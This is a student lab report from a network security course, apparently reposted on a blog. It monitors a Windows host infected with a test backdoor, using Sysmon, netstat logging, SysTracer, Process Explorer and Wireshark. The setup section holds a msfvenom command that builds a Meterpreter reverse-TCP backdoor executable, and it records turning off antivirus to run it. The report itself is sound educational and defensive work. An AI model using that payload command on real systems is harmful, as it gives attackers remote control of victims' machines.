20145223 杨梦云 《网络对抗》恶意代码分析

最新推荐文章于 2024-10-05 23:22:42 发布
最新推荐文章于 2024-10-05 23:22:42 发布
阅读量114 收藏
点赞数
文章标签: 操作系统 运维 网络
原文链接:http://www.cnblogs.com/20145223ymy/p/6659822.html
版权

20145223 杨梦云 《网络对抗》恶意代码分析

问题回答

(1)如果在工作中怀疑一台主机上有恶意代码,但只是猜想,所有想监控下系统一天天的到底在干些什么。请设计下你想监控的操作有哪些,用什么方法来监控。

可以使用sysmon工具,在日志里可以看到在什么地方什么地点启动了一个可疑的程序,除了知道它被放在了哪个文件夹下以外,还可以查看到它连到了哪个ip上。然后由所检查到的ip地址利用wireshark进行抓包筛选,看看是否有tcp的三次握手建立连接。Process Explorer可以查看有关和恶意代码进程的更多信息,除了tcp/ip网址以外还有进程的cpu占用率等。总结起来就是可疑文件、可疑的外部ip链接、可疑进程的相关信息,这些便是我想要监测的重点。

(2)如果已经确定是某个程序或进程有问题,你有什么工具可以进一步得到它的哪些信息。

systracer在主机上不同的时刻的抓包分析对比结果可以知道系统的注册表项是否有发生变化,是否有安插进可疑文件以及系统的开放端口。Process Explorer查看有关进程,如果该进程链接到某个可疑的ip地址并且cpu占用率很高,便可以进一步将它列入怀疑名单,查看该进程调用了哪些dll可以帮助分析该进程的操作目的。

2.实验总结与体会

这次试验我感觉其实实验本身并不难,比较麻烦的是在安装各种分析工具的时候遇到了大大小小的问题。比如在使用各种工具进行分析的时候比较陌生,除了上学期其他课程里用过的wireshark软件,其他的东西很多操作都不会,在使用systracer的时候以为像wireshark一样于是点击完snap shot以后没等多久便stop了,结果就是什么也没有出来,也不知道问题出在哪里= =(名字误导新人啊shot不是应该很快才对吗???)不过最终还是能做出了结果,在百度翻译(英语六级也救不了我QAQ)的帮助下才看懂了大致的内容和信息,完成了这次实验...

实践过程记录

(一)事前准备

一开始,由于连上了图书馆的网络导致ip地址改变,重复一次实验二的相关步骤,kali命令行下输入
msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.3.4.180 LPORT=5223 -f exe >im5223.exe
生成新的后门程序。关闭360杀毒软件(是的又是这个被老师吐槽过的360,因为懒所以还是用的很开心...),将后门程序传到自己的主机上。然后msfconsole打开msf进行ip地址和端口号的相关配置:

890352-20170402210431195-536302610.png

配置好后进行回连:

890352-20170402210437305-2141298466.png

(二)tcpview

可以看到后门程序运行,与ip为172.30.4.180的虚拟机建立连接,端口为5223

890352-20170402210443570-727901954.png

(三)netstat

编写txt文件,保存后修改为.bat文件
date /t >> c:\netstatlog.txt
time /t >> c:\netstatlog.txt
netstat -bn >> c:\netstatlog.txt
1、设置任务计划触发器重复任务间断为五分钟一次:

890352-20170402210459227-937180227.png

2、设置操作:

890352-20170402210518242-543554535.png

3、运行netstat

890352-20170402210557555-902031023.png

4、设置好以后等一段时间,在该文件夹下就会出现一个txt文档:

890352-20170402210544805-122460352.png

5、打开netstatlog,可以看到记录了im5223这个后门程序连接到172.30.4.180端口为5223

890352-20170402210533227-1468430570.png

6、运行netstat

890352-20170402210557555-902031023.png

(四)systracer前后对比

snapshot #1:起始状态; snapshot #2:复制恶意代到主机; snapshot #3:运行恶意代码; snapshot #4:控制端获取主机shell

890352-20170402210627430-361657399.png

1、snapshot #1和snapshot #2进行注册表项对比:

890352-20170402210641820-1163859708.png

可以看见系统在复制代码到主机上后,注册表项中出现了一些新的东西,然而我没有看出什么有用的信息来=-=,接着往下。。。
2、在snapshot #2和snapshot #3的对比中,在文件里找到了新出现的正在运行的im5223程序,可以看出这个程序进行了一大堆操作,并且对注册表项进行了修改,同时在snapshot #3和snapshot #4的对比中打开句柄,程序执行了有一些了与远程打印服务有关的内容,因为kali上做了screen截图的操作(这里没有截图))

890352-20170402210658305-1691061333.png

(五)Process Explorer查看恶意程序

1、运行Process Explorer查看运行中的程序,找到im5223.exe:

890352-20170402210718445-1407758418.png

2、打开TCP/IP这一栏,可以看到im5223.exe这个程序连到了ip地址为172.30.4.145的kali机上,同时能看到端口为5223

890352-20170402210736664-1606027901.png

3、点开Image一栏,上面显示了文件所处的位置,以及程序建立和开始运行的时间:

890352-20170402210807149-1107157141.png

4、点开Perfomance Graph,该程序的cpu使用率达到了近百分之12.5,可以说明,这个程序在看不见的地方运行,但是仍然消耗了大量的系统资源,值得作为恶意代码进行关注:

890352-20170402210826727-1251950586.png

(六)Wireshark捕包

在进行回连的过程中进行抓包,并且通过tcp选项进行筛选,可以看到在捕获的大量数据包中存在着tcp三次握手过程已经其他的数据包传输,除此以外同样能能看见虚拟机的目的地址和端口号、ma地址。

890352-20170402210839883-1620316320.png

(七)Sysmon

1、下载sysmon,(这里用的是老师的xml),同时命令行要以管理员身份运行,否则的话就会安装失败出现提示:

890352-20170402210851508-1758340012.png

2、打开任务管理器:(吐槽一下win8的设计,找了半天没找到,最后将鼠标桌面左下角空白处,右键点开任务管理器)

890352-20170402210901070-961669766.png

3、Applications and Services Logs/Microsoft/Windows/Sysmon/Operational下找到回连记录,程序使用tcp协议回连kali,进程id为6328,目的ip为172.30.4.180,目的端口号为5223

890352-20170402210915586-34500101.png

转载于:https://www.cnblogs.com/20145223ymy/p/6659822.html

weixin_34210740
关注
学生成绩管理系统(六):项目总结
weixin_30908707的博客
06-19 9385
学生成绩管理系统(六):项目总结 一、项目实现情况 初期项目计划: 简单的图形界面登录功能。 对数据库的的信息的查询功能。 对数据库的的信息的修改功能。 对数据库的的信息的删除功能。 对数据库的的信息的添加功能。 当以学生身份登录时只有查询的功能。 当教师登陆时既可以查询也可以进行修改、删除、添加的操作。 最终项目实现的功能: 软件功能架构图: 软件功能介绍: 输入用户名和密码进入系统主界...
20145223杨梦云网络对抗》 后门原理与实践
weixin_33912246的博客
03-19 138
20145223杨梦云网络对抗》 后门原理与实践 一、基础问题回答 (1)例举你能想到的一个后门进入到你系统中的可能方式? ·我们在网上下载一些应用软件的时候,或者是下载一些免费的音乐电影之类的东西,还有在安装软件的过程中一些捆绑的软件,浏览不可信的网页,都有可能会让后门进入到我们的系统中。 (2)例举你知道的后门如何启动起来(win及linux)的方式? ·win:1、直接双击后门程序 2、...
20145223杨梦云网络对抗》第一周学习总结
weixin_33725722的博客
03-05 142
20145223杨梦云网络对抗》第一周学习总结 逆向及Bof基础实践说明 实践目标 本次实践的对象是一个名为pwn1的linux可执行文件。 该程序正常执行流程是:main调用foo函数,foo函数会简单回显任何用户输入的字符串。 该程序同时包含另一个代码片段,getShell,会返回一个可用Shell。正常情况下这个代码是不会被运行的。我们实践的目标就是想办法运行这个代码片段。我们将学习两种方...
20145223 杨梦云网络对抗》 Web基础
weixin_34122548的博客
05-05 129
20145223 杨梦云网络对抗》 Web基础 1.实验后回答问题 (1)什么是表单 表单在网页中主要负责数据采集功能。一个表单有三个基本组成部分:(1) 表单标签:这里面包含了处理表单数据所用CGI程序的URL以及数据提交到服务器的方法。 (2) 表单域:包含了文本框、密码框、隐藏域、多行文本框、复选框、单选框、下拉选择框和文件上传框等。 (3)表单按钮:包括提交按钮、复位按钮和一般按...
20145223 杨梦云网络对抗》 MSF基础应用
weixin_34303897的博客
04-14 215
20145223 杨梦云 《网路对抗》 MSF基础应用 1、实验后回答问题:用自己的话解释什么是exploit,payload,encode (1)百度百科上说Exploit 的英文意思就是利用,它在黑客眼里就是漏洞利用。我自己的理解是,在我们事先发现系统漏洞后,通过一些数据方面的相关设置,最后通过exploit来执行这些设置攻击漏洞。 (2)payload翻译为有效载荷,我们真正攻击漏洞所依靠的...
20145223 杨梦云网络对抗网络欺诈技术防范
weixin_34392843的博客
04-29 111
20145223 杨梦云网络对抗网络欺诈技术防范 1.实验后回答问题 (1)通常在什么场景下容易受到DNS spoof攻击 在同一个局域网下,靶机与攻击者主机可以相互ping通的时候 (2)在日常生活工作中如何防范以上两攻击方法 不随意链接公共场合等地的不可信WiFi,不轻易点开陌生的网址和链接,不要随便扫二维码,更不在这些不受信任的网页中输入自己的隐私信息,发现熟悉的网站有不对的地方(比...
20145223 杨梦云网络对抗》 Web安全基础实践
weixin_33786077的博客
05-14 112
20145223 杨梦云网络对抗》 Web安全基础实践 1.实验后回答问题 (1)SQL注入攻击原理,如何防御 **原理**:SQL注入攻击是通过构建特殊的输入作为参数传入web应用程序欺骗服务器,执行攻击者想要的恶意SQL语句。 **防御**:实现SQL注入的主要原因是程序对于用户输入的数据没有限制或者有疏漏,有以下一些方法: 1、限制用户输入的字符串长度,制定相关规则,如不许出现特殊符号...
20145223杨梦云网络对抗》 免杀原理与实践
weixin_33749242的博客
03-26 117
20145223杨梦云网络对抗》 免杀原理与实践 1.基础问题回答 (1)杀软是如何检测出恶意代码的? 1:基于特征码 一段特征码就是一段或多段数据。(如果一个可执行文件(或其他运行的库、脚本等)包含这样的数据则被认为是恶意代码) 杀毒软件有自己专门的特征码库,在检测一个程序是否是恶意代码时就看这个程序中的是否包含有特征码库中的特征码,如果有就进行查杀。但是特征码库并不是总是能第一时间更新,如...
鸿蒙开发(NEXT/API 12)【申请接入Wear Engine服务】 穿戴服务
鸿蒙的技术博客
09-30 828
申请Wear Engine服务前(开发者需实名认证为个人开发者或者企业开发者,认证前,请先了解二者的[权益区别] ),确认开发环境并完成创建项目、创建HarmonyOS应用等基本准备工作,再继续进行以下开发活动。
Linux 再入门整理:详解 /etc/fstab 文件
一只奋斗的猪
10-01 1187
`/etc/fstab` 文件是 Linux 系统中用于定义和管理文件系统的挂载信息的配置文件。它的作用是告诉系统在启动时,应该如何自动挂载各种文件系统。挂载是 Linux 操作系统中一种将存储设备与目录树关联的操作。通过挂载,存储设备中的文件可以通过目录访问。
Django Nginx+uwsgi 安装配置
lly202406的博客
10-02 554
本文将详细介绍如何在Linux环境下安装和配置Django应用程序,使用Nginx作为Web服务器和uwsgi作为应用程序服务器。
使用Python实现在 Linux 和 Windows 之间的双向文件传输
2301_80892630的博客
09-29 707
在 Linux 和 Windows 之间可以用python程序实现双向文件传输,通过创建一个简单的文件传输程序来实现。该程序将使用套接字socket通信,允许任意一端发送或接收文件。这是在我的那篇实现python两个进程之间相互通信的基础上拓展的(不过只看这一篇文章也行),那篇文章传输的数据是字符串类型,今天我来实现文件的传输。
Linux嵌入式有发展吗,以及对uboot,kernel,rootfs的领悟
rjszcb的博客
09-30 767
上一份工作是2022,11—2023,11年底,汽车公司,底层修修改改,编译镜像,修改后,客户给东西,重新编译给他,客制化配置启动参数,环境,支持应用部门,不懂怎么使用某些驱动。uboot到底是干嘛的,想想,emmc的镜像文件是怎么被读到ddr的,emmc为啥可以被分区,烧录镜像,tftp网络命令为啥可以运行,启动设备时,为啥lcd可以看到图像,kernel还没启动,怎么出图像的。不管做应用开发,驱动开发也好,知道,系统原理,驱动框架,进程管理调度,内核竞争,信号,中断,锁,这些就够了。
如何构建高并发网络服务器?(总结)
喜欢就关注吧
10-04 766
如何构建高并发网络服务器?介绍了IO复用select,poll,epoll和异步IOiocp的使用。
HarmonyOs 查看官方文档使用弹窗
制定持续可量化的目标,不断坚持。
09-29 1012
HarmonyOS跟上网上的视频学习一段时间后,基本也就入门了,但是有一些操作网上没有找到合适教学的视频,这时,大家就需要养成参考官方文档的习惯了,因为官方的开发文档是我们学习深度任何一门语言或框架的途径,官网的开发文档写的足够全面,可以在其中学到一些网上视频所没有的内容。官网文档ArkUI链接:ArkUI简介-ArkUI(方舟UI框架)-应用框架 - 华为HarmonyOS开发者 (huawei.com)
进程管理工具:非daemon进程管理工具supervisor
happy_king_zi的博客
09-29 1112
supervisor是一个 Client/Server模式的系统,允许用户在类unix操作系统上监视和控制多个进程,或者可以说是多个程序。supervisor与launchd,daemontools,runit等程序有着相同的功能,与其中某些程序不同的是,它并不作为“id 为 1的进程”而替代init。相反,它用于控制应用程序,像启动其它程序一样,通俗理解就是,把Supervisor服务管理的进程程序,它们作为supervisor的子进程来运行,而supervisor是父进程。
【鸿蒙开发】探索HarmonyNext开发:常用注解详解与实战
一个不断前行的程序者
10-02 1104
本文介绍了HarmonyNext开发中一些常用的注解及其作用,并通过代码示例展示了如何在HarmonyOS应用开发中使用这些注解。注解为开发者提供了一种强大的代码组织和管理方式,有助于简化代码和提高开发效率。希望这些内容能够帮助您更好地理解和应用HarmonyNext的注解,为您的鸿蒙开发之旅增添助力。
一个月学会Java 第2天 认识类与对象
最新发布
XingZaiUnrivaled的博客
10-05 721
一个月学会Java 第二天 认识类与对象
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值